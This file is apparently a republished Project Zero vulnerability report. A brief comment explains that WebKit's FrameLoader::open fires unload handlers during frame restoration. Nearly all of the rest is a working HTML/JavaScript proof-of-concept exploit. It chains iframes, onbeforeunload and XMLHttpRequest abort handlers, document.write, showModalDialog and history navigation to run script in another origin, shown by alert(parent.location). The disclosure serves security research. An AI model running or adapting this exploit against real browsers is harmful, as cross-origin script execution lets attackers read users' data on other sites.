<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1197

This is similar to the case https://bugs.chromium.org/p/project-zero/issues/detail?id=1151. But this time, JavaScript handlers may be fired in FrameLoader::open.

void FrameLoader::open(CachedFrameBase& cachedFrame)
{
    ...
    clear(document, true, true, cachedFrame.isMainFrame()); <<--------- prepareForDestruction, which fires unload events, is called.
    ...
}

PoC:
-->
<html>
<body>
Click anywhere...
<script>
// Wrap a string in a Blob and return an object URL for it.
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

// Navigate window `w` by synthesizing a click on an anchor inside it.
function navigate(w, url) {
    let a = w.document.createElement('a');
    a.href = url;
    a.click();
}

window.onclick = () => {
    window.w = open('about:blank', 'w', 'width=500, height=500');
    let i0 = w.document.body.appendChild(document.createElement('iframe'));
    let i1 = w.document.body.appendChild(document.createElement('iframe'));

    i0.contentWindow.onbeforeunload = () => {
        i0.contentWindow.onbeforeunload = null;
        navigate(w, 'about:blank');
    };

    navigate(i0.contentWindow, createURL(`<body><script></scrip` + 't></body>'));

    setTimeout(() => {
        let g = i0.contentDocument.body.appendChild(document.createElement('iframe'));
        let x = new g.contentWindow.XMLHttpRequest();
        x.onabort = () => {
            parseFloat('axfasdfasfdsfasfsfasdf');
            i0.contentDocument.write();
            navigate(w, 'https://abc.xyz/');

            showModalDialog(createURL(`
<script>
let it = setInterval(() => {
    try {
        opener.w.document.x;
    } catch (e) {
        clearInterval(it);
        window.close();
    }
}, 10);
</scrip` + 't>'));

            setTimeout(() => {
                i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>';
                navigate(i1.contentWindow, 'about:srcdoc');
            }, 10);
        };

        x.open('GET', createURL('x'.repeat(0x1000000)));
        x.send();

        w.history.go(-2);
    }, 200);
};
</script>
</body>
</html>